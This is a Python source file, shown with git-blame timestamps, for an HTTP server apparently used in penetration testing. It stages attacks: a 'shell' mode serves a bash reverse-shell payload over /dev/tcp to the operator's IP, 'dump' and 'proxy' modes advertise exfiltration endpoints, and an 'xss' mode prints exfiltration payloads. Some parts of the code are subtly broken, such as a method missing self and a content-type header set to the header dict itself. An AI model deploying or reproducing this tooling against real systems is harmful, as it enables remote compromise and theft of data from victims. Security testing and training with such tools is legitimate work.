2020-09-27 14:00:20 +02:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
2021-05-31 14:13:01 +02:00
|
|
|
from urllib.parse import urlparse
|
2020-09-27 14:37:52 +02:00
|
|
|
import threading
|
2020-10-21 21:41:06 +02:00
|
|
|
import requests
|
2020-09-27 14:37:52 +02:00
|
|
|
import sys
|
2021-12-08 17:50:48 +01:00
|
|
|
import time
|
2020-10-15 14:35:16 +02:00
|
|
|
import os
|
|
|
|
import ssl
|
2021-05-12 15:58:19 +02:00
|
|
|
import util
|
|
|
|
import xss_handler
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
class FileServerRequestHandler(BaseHTTPRequestHandler):
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def __init__(self, *args, **kwargs):
|
|
|
|
super().__init__(*args, **kwargs)
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2021-05-12 15:58:19 +02:00
|
|
|
def do_HEAD(self):
|
|
|
|
self.do_GET()
|
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def do_POST(self):
|
|
|
|
self.do_GET()
|
|
|
|
|
2021-05-31 14:13:01 +02:00
|
|
|
def onForward(self, base_path, target):
|
|
|
|
path = self.path[max(0, len(base_path)-1):]
|
|
|
|
parts = urlparse(target)
|
|
|
|
if path.startswith(parts.path):
|
|
|
|
path = path[len(parts.path):]
|
|
|
|
|
|
|
|
target_rewrite = target + path
|
|
|
|
|
|
|
|
# queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
|
|
|
# if queryStr:
|
|
|
|
# target += "?" if "?" not in target else "&"
|
|
|
|
# target += queryStr
|
|
|
|
|
|
|
|
contentLength = self.headers.get('Content-Length')
|
|
|
|
data = None
|
|
|
|
|
|
|
|
if contentLength and int(contentLength) > 0:
|
|
|
|
data = self.rfile.read(int(contentLength))
|
2020-10-21 21:41:06 +02:00
|
|
|
|
2021-08-28 13:41:46 +02:00
|
|
|
if "Host" in self.headers:
|
|
|
|
del self.headers["Host"]
|
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
method = self.command
|
2021-05-31 14:13:01 +02:00
|
|
|
print(target, "=>", method, target_rewrite)
|
|
|
|
res = requests.request(method, target_rewrite, headers=self.headers, data=data)
|
|
|
|
return res.status_code, res.content, res.headers
|
|
|
|
|
|
|
|
|
|
|
|
def find_route(self, path):
|
|
|
|
|
|
|
|
if path in self.server.routes:
|
|
|
|
return self.server.routes[path]
|
|
|
|
|
|
|
|
for p, route in self.server.prefix_routes.items():
|
|
|
|
if path.startswith(p):
|
|
|
|
return route
|
|
|
|
|
|
|
|
def not_found(req):
|
|
|
|
return 404, b"", {}
|
|
|
|
|
|
|
|
return not_found
|
|
|
|
|
|
|
|
def do_OPTIONS(self):
|
|
|
|
self.do_GET()
|
2020-10-21 21:41:06 +02:00
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def do_GET(self):
|
2022-03-01 14:08:53 +01:00
|
|
|
try:
|
|
|
|
if not self.server.is_running:
|
|
|
|
self.send_response(200)
|
|
|
|
self.end_headers()
|
|
|
|
return
|
2020-10-21 21:41:06 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
path = self.server.cleanPath(self.path)
|
|
|
|
route = self.find_route(path)
|
|
|
|
result = route(self)
|
2021-05-31 14:13:01 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]
|
|
|
|
status_code = 200 if len(result) < 1 else result[0]
|
|
|
|
data = b"" if len(result) < 2 else result[1]
|
|
|
|
headers = { } if len(result) < 3 else result[2]
|
2021-05-20 13:11:42 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if path in self.server.dumpRequests:
|
|
|
|
headers["Access-Control-Allow-Origin"] = "*"
|
2021-12-08 17:50:48 +01:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
headers["Content-Length"] = len(data)
|
2022-02-16 14:18:54 +01:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if len(headers) == 0:
|
|
|
|
self.send_response(status_code)
|
|
|
|
else:
|
|
|
|
if path != "/dummy":
|
|
|
|
self.log_request(status_code)
|
|
|
|
self.send_response_only(status_code)
|
2021-05-20 13:11:42 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
for key, value in headers.items():
|
|
|
|
if key.lower() not in blacklist_headers:
|
|
|
|
self.send_header(key, value)
|
2021-05-20 13:11:42 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if self.command.upper() == "OPTIONS":
|
|
|
|
self.send_header("Allow", "OPTIONS, GET, HEAD, POST")
|
2020-10-21 21:41:06 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
self.end_headers()
|
2021-05-31 14:13:01 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if data and self.command.upper() not in ["HEAD","OPTIONS"]:
|
|
|
|
self.wfile.write(data)
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
|
|
|
|
contentLength = self.headers.get('Content-Length')
|
|
|
|
body = None
|
2020-10-15 14:35:16 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
if contentLength and int(contentLength) > 0:
|
|
|
|
body = self.rfile.read(int(contentLength))
|
2020-10-15 14:35:16 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
print("===== Connection from:",self.client_address[0])
|
|
|
|
print("%s %s %s" % (self.command, self.path, self.request_version))
|
|
|
|
print(str(self.headers).strip())
|
|
|
|
if body:
|
|
|
|
print()
|
|
|
|
print(body)
|
|
|
|
print("==========")
|
|
|
|
except Exception as e:
|
|
|
|
print("Exception on handling http", str(e))
|
2020-10-15 14:35:16 +02:00
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def log_message(self, format, *args):
|
2020-09-27 14:37:52 +02:00
|
|
|
if self.server.logRequests:
|
2020-10-15 14:35:16 +02:00
|
|
|
super().log_message(format, *args)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
|
|
|
|
def __init__(self, addr, port):
|
|
|
|
super().__init__((addr, port), FileServerRequestHandler)
|
|
|
|
self.logRequests = False
|
2020-10-21 21:41:06 +02:00
|
|
|
self.routes = { }
|
2020-10-15 14:35:16 +02:00
|
|
|
self.dumpRequests = []
|
2021-05-31 14:13:01 +02:00
|
|
|
self.prefix_routes = { }
|
2021-06-05 14:24:35 +02:00
|
|
|
self.is_running = True
|
2021-12-08 17:50:48 +01:00
|
|
|
self.listen_thread = None
|
|
|
|
self.has_exited = False
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def cleanPath(self, path):
|
|
|
|
|
|
|
|
if "?" in path:
|
|
|
|
path = path[0:path.find("?")]
|
|
|
|
|
|
|
|
if not path.startswith("/"):
|
|
|
|
path = "/" + path
|
|
|
|
|
|
|
|
return path.strip()
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2021-08-28 13:41:46 +02:00
|
|
|
def addFile(self, name, data, mimeType=None):
|
2022-03-01 14:08:53 +01:00
|
|
|
|
|
|
|
if hasattr(data, "read"):
|
|
|
|
fd = data
|
|
|
|
data = data.read()
|
|
|
|
fd.close()
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
if isinstance(data, str):
|
|
|
|
data = data.encode("UTF-8")
|
2022-03-01 14:08:53 +01:00
|
|
|
|
2022-02-16 14:18:54 +01:00
|
|
|
headers = {
|
|
|
|
"Access-Control-Allow-Origin": "*",
|
|
|
|
}
|
2021-08-28 13:41:46 +02:00
|
|
|
if mimeType:
|
2022-02-16 14:18:54 +01:00
|
|
|
headers["Content-Type"] = headers
|
|
|
|
|
|
|
|
# return 200 - OK and data
|
|
|
|
self.addRoute(name, lambda req: (200, data, headers))
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2022-03-01 14:08:53 +01:00
|
|
|
def add_file_path(self, path, name=None):
|
|
|
|
def readfile():
|
|
|
|
with open(path, "rb") as f:
|
|
|
|
return f.read()
|
|
|
|
|
|
|
|
if name is None:
|
|
|
|
name = os.path.basename(path)
|
|
|
|
self.addRoute(name, lambda req: (200, readfile()))
|
|
|
|
|
|
|
|
def load_directory(self, path, recursive=True, exclude_ext=[]):
|
|
|
|
if not os.path.isdir(path):
|
|
|
|
print("Not a directory:", path)
|
|
|
|
return
|
|
|
|
|
|
|
|
for dp, dn, filenames in os.walk(path):
|
|
|
|
for f in filenames:
|
|
|
|
file_path = os.path.join(dp, f)
|
|
|
|
if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
|
|
|
|
relative_path = file_path[len(path):]
|
|
|
|
self.add_file_path(file_path, relative_path)
|
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def dumpRequest(self, name):
|
2020-10-21 21:41:06 +02:00
|
|
|
self.dumpRequests.append(self.cleanPath(name))
|
|
|
|
|
|
|
|
def addRoute(self, path, func):
|
|
|
|
self.routes[self.cleanPath(path)] = func
|
|
|
|
|
2021-05-31 14:13:01 +02:00
|
|
|
def addPrefixRoute(self, path, func):
|
|
|
|
self.prefix_routes[self.cleanPath(path)] = func
|
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def forwardRequest(self, path, target):
|
2021-05-31 14:13:01 +02:00
|
|
|
self.addPrefixRoute(path, lambda req: req.onForward(path, target))
|
2020-10-15 14:35:16 +02:00
|
|
|
|
|
|
|
def enableLogging(self):
|
|
|
|
self.logRequests = True
|
|
|
|
|
2021-12-08 17:50:48 +01:00
|
|
|
def enableSSL(self, keyFile="private.key", certFile="server.crt"):
|
|
|
|
|
|
|
|
if not os.path.isfile(keyFile):
|
|
|
|
print("Generating private key and certificate…")
|
2020-10-15 14:35:16 +02:00
|
|
|
os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")
|
2021-12-08 17:50:48 +01:00
|
|
|
elif not os.path.isfile(certFile):
|
|
|
|
print("Generating certificate…")
|
|
|
|
os.system("openssl req -new -x509 -keyin private.key -out server.crt -days 365 -nodes")
|
2020-10-15 14:35:16 +02:00
|
|
|
|
|
|
|
self.socket = ssl.wrap_socket(self.socket,
|
|
|
|
server_side=True,
|
|
|
|
certfile=certFile,
|
|
|
|
keyfile=keyFile,
|
|
|
|
ssl_version=ssl.PROTOCOL_TLS,
|
|
|
|
cert_reqs=ssl.CERT_NONE)
|
|
|
|
|
|
|
|
# try:
|
|
|
|
# ssl._create_default_https_context = ssl._create_unverified_context
|
|
|
|
# except AttributeError:
|
|
|
|
# print("Legacy Python that doesn't verify HTTPS certificates by default")
|
|
|
|
# pass
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def startBackground(self):
|
2021-12-08 17:50:48 +01:00
|
|
|
self.listen_thread = threading.Thread(target=self.serve_forever)
|
|
|
|
self.listen_thread.start()
|
|
|
|
return self.listen_thread
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def start(self):
|
|
|
|
return self.serve_forever()
|
|
|
|
|
2021-12-08 17:50:48 +01:00
|
|
|
def get_base_url():
|
|
|
|
addr, port = self.server_address
|
|
|
|
if port != 80:
|
|
|
|
port = f":{port}"
|
|
|
|
protocol = "https" if gettype(self.socket) == ssl.SSLSocket else "http"
|
|
|
|
return f"{protocol}://{addr}{port}"
|
|
|
|
|
2021-06-05 14:24:35 +02:00
|
|
|
def stop(self):
|
|
|
|
self.is_running = False
|
2021-12-08 17:50:48 +01:00
|
|
|
time.sleep(1)
|
|
|
|
|
|
|
|
try:
|
|
|
|
# dummy request
|
|
|
|
for i in range(3):
|
|
|
|
requests.get(f"{self.get_base_url()}/dummy")
|
|
|
|
if self.has_exited:
|
|
|
|
break
|
|
|
|
time.sleep(1)
|
|
|
|
except:
|
|
|
|
pass
|
|
|
|
|
|
|
|
if self.listen_thread != threading.currentThread():
|
|
|
|
self.listen_thread.join()
|
2021-06-05 14:24:35 +02:00
|
|
|
|
|
|
|
def serve_forever(self):
|
2021-12-08 17:50:48 +01:00
|
|
|
self.has_exited = False
|
2021-06-05 14:24:35 +02:00
|
|
|
while self.is_running:
|
|
|
|
self.handle_request()
|
2021-12-08 17:50:48 +01:00
|
|
|
self.has_exited = True
|
2021-06-05 14:24:35 +02:00
|
|
|
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
if __name__ == "__main__":
|
2021-04-30 22:50:58 +02:00
|
|
|
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
|
|
|
|
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
2020-10-21 21:41:06 +02:00
|
|
|
exit(1)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2021-04-30 22:50:58 +02:00
|
|
|
httpPort = 80
|
|
|
|
fileServer = HttpFileServer("0.0.0.0", httpPort)
|
2022-12-09 14:54:06 +01:00
|
|
|
ipAddress = util.get_address()
|
2020-10-21 21:41:06 +02:00
|
|
|
|
|
|
|
if sys.argv[1] == "shell":
|
|
|
|
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
|
|
|
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
|
fileServer.addFile("shell.sh", rev_shell)
|
2023-09-07 12:09:09 +02:00
|
|
|
fileServer.dumpRequest("/")
|
2020-10-21 21:41:06 +02:00
|
|
|
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
|
elif sys.argv[1] == "dump":
|
2021-07-17 17:44:21 +02:00
|
|
|
fileServer.dumpRequest("/")
|
2021-08-28 13:41:46 +02:00
|
|
|
print("Exfiltrate data using: http://%s/" % ipAddress)
|
2020-10-21 21:41:06 +02:00
|
|
|
elif sys.argv[1] == "proxy":
|
2021-04-30 22:50:58 +02:00
|
|
|
url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
|
|
|
|
fileServer.forwardRequest("/proxy", url)
|
2020-10-21 21:41:06 +02:00
|
|
|
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
2021-04-30 22:50:58 +02:00
|
|
|
elif sys.argv[1] == "xss":
|
|
|
|
type = "img" if len(sys.argv) < 3 else sys.argv[2]
|
|
|
|
xss = xss_handler.generatePayload(type, ipAddress, httpPort)
|
|
|
|
print("Exfiltrate data using:")
|
|
|
|
print(xss)
|
2020-10-21 21:41:06 +02:00
|
|
|
|
|
|
|
fileServer.start()
|